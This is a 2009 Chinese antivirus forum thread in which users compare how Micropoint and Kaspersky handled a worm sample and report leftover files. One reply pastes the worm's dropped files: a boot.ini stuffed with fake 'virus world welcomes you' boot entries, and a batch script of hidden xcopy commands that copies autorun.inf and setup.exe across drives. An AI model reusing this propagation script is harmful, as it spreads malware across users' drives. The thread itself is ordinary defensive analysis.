微点交流论坛

标题: 卡巴报特权提升，微点报蠕虫 [打印本页]

作者: keyoushi 时间: 2009-2-23 22:21 标题: 卡巴报特权提升，微点报蠕虫

看图说话，此程序实机运行后微点首先拦截并报蠕虫，删除病毒后卡巴才报其有提升特权修改注册表行为。因为实现免疫过所有硬盘，所以病毒未能生成AUTORUN.INF文件在硬盘根目录下。
1.请看其修改时间：

2.实机运行，微点拦截：

3.卡巴HIPS（互交模式）提示特权提升：

目前尚不确定是否存在衍生物残留，稍后重启观察。

作者: Legend 时间: 2009-2-23 22:38
楼主希望您能将比样本 setup.rar 发送到我们的virus@micropoint.com.cn邮箱我们分析确认一下。
来信请在内容中写上这个帖子的网址，方便我们帮您查收处理，谢谢。

作者: snhao 时间: 2009-2-23 22:39
我刚测了这个
微点拦截不完全,病毒文件
boot.ini
player.exe
setup.bat
没有被清除
boot loader]
timeout=9999
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来让死一回" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来！" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(1)rdisk(7)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(1)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(1)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(2)rdisk(0)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(2)partition(1)\WINDOWS="病毒世界欢迎你到来" /noexecute=optin /fastdetect

xcopy "d:\autorun.inf" c:\ /H/y >nul 2>nul
xcopy "D:\autorun.inf" e:\ /H/y >nul 2>nul
xcopy "e:\autorun.inf" f:\ /h/y >nul 2>nul
xcopy "f:\autorun.inf" c:\ /H/y >nul 2>nul
xcopy "C:\autorun.inf" i:\ /H/y >nul 2>nul
xcopy "D:\autorun.inf" d:\ /H/y >nul 2>nul
xcopy "e:\autorun.inf" j:\ /h/y >nul 2>nul
xcopy "f:\autorun.inf" c:\ /H/y >nul 2>nul
xcopy "d:\setup.exe" c:\ /H/y >nul 2>nul
xcopy "D:\setup.exe" e:\ /H/y >nul 2>nul
xcopy "e:\setup.exe" f:\ /h/y >nul 2>nul
xcopy "f:\setup.exe" c:\ /H/y >nul 2>nul
xcopy "C:\setup.exe" i:\ /H/y >nul 2>nul
xcopy "D:\setup.exe" d:\ /H/y >nul 2>nul
xcopy "e:\setup.exe" j:\ /h/y >nul 2>nul
xcopy "f:\setup.exe" c:\ /H/y >nul 2>nul

作者: keyoushi 时间: 2009-2-23 22:41
实在不好意思超版，因为微点已经识别，未报未知，所以样本已经删除了。请稍等我用软件恢复一下。

作者: snhao 时间: 2009-2-23 22:41
微点为什么不能把所有病毒生成文件都清除呢?

作者: keyoushi 时间: 2009-2-23 22:47

Quote:

Originally posted by snhao at 2009-2-23 22:41:
微点为什么不能把所有病毒生成文件都清除呢?

LS你没看清楚我的帖子，这个病毒还是挺狠的，所以我事先免疫了所有硬盘，在所有硬盘根目录下建立了AUTO.INF空文件夹，所以病毒未能成功写入。为了保险起见我同时开启了卡巴的互交模式。微点可以拦截的。

作者: snhao 时间: 2009-2-23 22:50
我也免疫了啊,你还是先看看你的磁盘目录下有没有什么可疑的东东吧.

[ Last edited by snhao on 2009-2-23 at 22:59 ]

作者: snhao 时间: 2009-2-23 22:51
boot.ini
player.exe
setup.bat
搜索下

作者: keyoushi 时间: 2009-2-23 22:56
样本已经发送到：virus@micropoint.com.cn
解压密码：virus
烦请查收，谢谢！

作者: Legend 时间: 2009-2-23 23:00
多谢，我们分析确认后会给您回复的。

作者: keyoushi 时间: 2009-2-23 23:03
额，确有残留，红色的框是事先建立的AUTORUN.INF文件夹，蓝色部分的确是残留。这些残留应该不再有威胁，因为.inf文件未写入，删除鸟事~

多谢提醒，正好清理下垃圾吼吼~

作者: keyoushi 时间: 2009-2-23 23:08
又看了一下，因为微点和卡巴都很快拦截并且卡巴的HIPS规则里我设置了FD，所以只有D盘有残留。

作者: tod20010_ren 时间: 2009-2-25 17:13
楼主装卡巴和微点,功能有点重复啊.实机运行病毒很危险啊.

作者: wsmurderer 时间: 2009-2-25 17:56
这个病毒有点变态，昨天把我rmb、mp3、gho文件全部删除了，ie也被损坏，好几十个G，幸亏系统还能启动，希望微点加强对其他非系统文件的保护，目前对这种疯狂删除非系统文件的病毒微点好像不防。样本已经上报给微点了

作者: snhao 时间: 2009-2-25 20:50
MD我说我的rmb、mp3、gho文件都哪儿去了呢,哎呀亏大了.

作者: 专业路过 时间: 2009-2-25 21:48

Quote:

Originally posted by snhao病毒世界欢迎你到来
multi(0)di ...

太可怕了，是不是一不注意我就让病毒给吃了呀，妈呀。电脑里面的病毒是不是会从屏幕里面蹦出来呀

作者: wsmurderer 时间: 2009-2-26 00:03

Quote:

Originally posted by snhao at 2009-2-25 20:50:
MD我说我的rmb、mp3、gho文件都哪儿去了呢,哎呀亏大了.

哈哈，有人陪我了:lol:

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn